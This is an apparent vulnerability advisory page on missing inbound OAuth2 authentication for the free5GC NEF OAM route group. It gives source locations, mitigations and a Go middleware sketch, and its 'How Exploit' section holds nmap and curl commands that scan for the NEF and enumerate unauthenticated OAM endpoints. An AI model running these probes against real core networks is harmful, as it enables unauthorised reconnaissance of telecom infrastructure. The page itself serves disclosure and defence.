free5GC’s Network Exposure Function (NEF) exposes an OAM (Operations, Administration, Maintenance) route group at `/nnef-oam/v1/`. This route group is mounted without any inbound OAuth2/bearer-token authorization middleware. The vulnerability exists because the NEF’s SBI (Service Based Interface) server does not enforce authentication for this specific route group, even though the NEF advertises `OAuth2 setting receive from NRF: true`.

The code evidence shows the OAM route group is mounted without auth middleware in `NFs/nef/internal/sbi/server.go:60`. The OAM route is exposed at `/` in `NFs/nef/internal/sbi/api_oam.go:9`, and the processor returns a `200 OK` response directly in `NFs/nef/internal/sbi/processor/oam.go:9`. The NEF context only supports outbound token acquisition via `GetTokenCtx`, with no inbound authorization path.

This allows any network attacker who can reach the NEF on the SBI to send a request to the OAM endpoint with no `Authorization` header at all. The handler responds with `200 OK` and returns null, confirming the lack of authentication. The structural defect is route-group-scoped, meaning any future OAM operation added to this group will inherit the missing inbound auth boundary by default. This vulnerability is tracked as upstream issue free5gc/free5gc861 and was fixed in free5gc/nef23.
DailyCVE Form:
Platform: free5GC NEF
Version: v4.2.1
Vulnerability: Missing Inbound Auth
Severity: Medium
Date: 2026-03-11
Prediction: Patch released Q2-2026
What Undercode Say:
```bash
# Check if NEF container is vulnerable
curl -i http://10.100.200.19:8000/nnef-oam/v1/
# Expected output: HTTP/1.1 200 OK

# Validate OAuth2 configuration
docker logs nef | grep OAuth

# Inspect the OAM route group mounting in source code
grep -n "router\.Group.*oam" free5gc/nef/internal/sbi/server.go

# Search for missing auth middleware
grep -A5 -B5 "oam" free5gc/nef/internal/sbi/server.go
```
How Exploit:
```bash
# Step 1: Identify reachable NEF SBI endpoint
nmap -p 8000 10.100.200.19

# Step 2: Send unauthenticated GET request
curl -k https://target:8000/nnef-oam/v1/ -H "Host: target:8000"

# Step 3: Observe 200 OK response without token
curl -i -X GET http://10.100.200.19:8000/nnef-oam/v1/

# Step 4: Enumerate other OAM endpoints
curl -i http://10.100.200.19:8000/nnef-oam/v1/admin
```
Protection from this CVE
- Apply the security patch from free5gc/nef23 immediately.
- Manually validate that the OAM route group includes the required OAuth2 middleware.
- Monitor NEF SBI logs for unauthenticated `/nnef-oam/v1/` requests.
- Implement network-level ACLs to restrict SBI access only to trusted network functions.
- Upgrade to free5GC version 4.2.2 or higher containing the fix.
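The group-level boundary and the validation step from the list above, as an added example that is not free5GC's code or the upstream patch: it uses Go's standard `net/http` in place of the project's router, and `TokenCheck`, `requireBearer`, `mountOAM` and `probe` are hypothetical names, with `TokenCheck` standing in for real validation of an NRF-issued token.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// TokenCheck is a hypothetical stand-in for NRF token validation, not a free5GC API.
type TokenCheck func(token string) bool

// requireBearer answers 401 unless the request carries a bearer token that check accepts.
func requireBearer(check TokenCheck, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		a := r.Header.Get("Authorization")
		if !strings.HasPrefix(a, "Bearer ") || !check(strings.TrimPrefix(a, "Bearer ")) {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// mountOAM builds the OAM group. check == nil reproduces the mounting described on the
// page; otherwise the middleware wraps the whole group, covering handlers added later.
func mountOAM(check TokenCheck) http.Handler {
	group := http.NewServeMux() // subtree pattern: every path under /nnef-oam/v1/
	group.HandleFunc("/nnef-oam/v1/", func(w http.ResponseWriter, r *http.Request) { fmt.Fprint(w, "null") })
	if check == nil {
		return group
	}
	return requireBearer(check, group)
}

// probe sends one in-process GET and returns the status; authz == "" sends no header.
func probe(h http.Handler, path, authz string) int {
	req := httptest.NewRequest(http.MethodGet, path, nil)
	if authz != "" {
		req.Header.Set("Authorization", authz)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	deny := func(string) bool { return false }
	fmt.Println(probe(mountOAM(nil), "/nnef-oam/v1/", ""), probe(mountOAM(deny), "/nnef-oam/v1/", ""))
}
```

Run as a regression test, `probe` against every path registered in the group catches a later handler that is mounted outside the middleware.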
Impact
Missing authentication (CWE-306) and authorization (CWE-862) on the NEF OAM route group. Any party that can reach NEF on the SBI can probe and enumerate the OAM route surface anonymously today, and any future OAM-group endpoint (read, modify, restart-style operations) will also be accessible without authentication. Operators who assume `OAuth2 setting receive from NRF: true` enforces inbound auth on NEF are wrong for this route group.
Sources:
Reported By: github.com

